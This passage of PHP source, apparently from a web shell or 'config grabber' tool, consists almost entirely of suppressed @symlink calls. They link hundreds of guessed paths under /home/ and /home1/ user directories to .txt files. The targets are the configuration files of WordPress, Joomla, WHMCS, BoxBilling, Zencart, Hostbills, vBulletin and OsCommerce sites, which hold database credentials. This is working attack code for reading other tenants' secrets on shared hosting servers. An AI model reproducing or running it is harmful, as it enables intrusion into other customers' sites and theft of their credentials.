  1286. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1287. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1288. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1289. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1290. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1291. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1292. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1293. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1294. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1295. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1296. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1297. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1298. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1299. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1300. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1301. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1302. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1303. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1304. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1305. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1306. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1307. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1308. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1309. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1310. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1311. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1312. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1313. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1314. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1315. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1316. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1319. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1322. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1323. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1324. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1325. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1326. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1327. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1328. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1329. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1330. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1331. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1332. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1333. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1334. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1335. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1336. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1337. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1338. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1339. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1340. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1341. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1342. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1343. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1344. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1345. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1346. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1347. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1348. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1349. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1350. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1351. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1352. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1353. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1354. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1355. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1356. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1357. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1358. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1359. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1360. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1361. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1362. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1363. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1364. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1365. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1378. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1379. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1380. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1381. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1382. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1383. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1384. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1385. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1386. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1387. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1388. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1389. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1390. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1391. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1392. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1393. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1394. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1395. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1396. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1397. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1398. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1399. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1400. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1401. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1402. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1403. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1404. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1405. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1406. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1407. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1408. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1409. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1410. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1411. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1412. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1413. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1414. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1415. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1416. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1417. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1418. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1419. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1420. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1421. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1422. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1423. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1424.  
  1425. //Home1
  1426.  
  1427. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1428. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1429. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1430. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1431. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1432. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1433. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1434. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1435. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1436. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1437. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1438. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1439. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1440. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1441. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1442. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1443. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1444. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1445. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1446. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1447. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1448. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1449. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1450. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1451. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1452. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1453. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1454. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1455. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1456. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1457. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1458. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1459. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1460. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1461. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1462. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1463. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1464. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1465. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1466. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1467. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1468. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1469. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1470. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1471. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1472. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1473. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1474. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1475. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1476. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1477. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1478. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1479. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1480. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1481. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1482. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1483. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1484. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1485. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1486. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1487. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1488. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1489. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1490. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1491. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1492. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1493. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1494. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1496. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1497. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1498. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1499. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1500. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1501. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1502. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1503. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1504. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1505. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1506. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1507. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1508. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1509. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1510. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1511. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1512. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1513. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1514. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1515. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1516. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1517. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1518. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1519. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1520. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1521. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1522. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1523. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1524. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1525. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1526. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1527. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1528. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1529. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1530. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1531. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1532. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1533. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1534. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1535. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1536. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1537. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1538. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1539. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1540. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1541. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1542. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1543. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1544. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1545. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1546. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1547. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1548. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1549. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1566. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1567. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1568. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1569. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1570. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1571. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1572. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1573. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1574. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1575. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1576. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1577. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1578. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1579. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1580. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1581. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1582. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1583. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1584. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1585. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1586. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1587. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1588. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1589. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1590. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1591. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1592. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1593. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
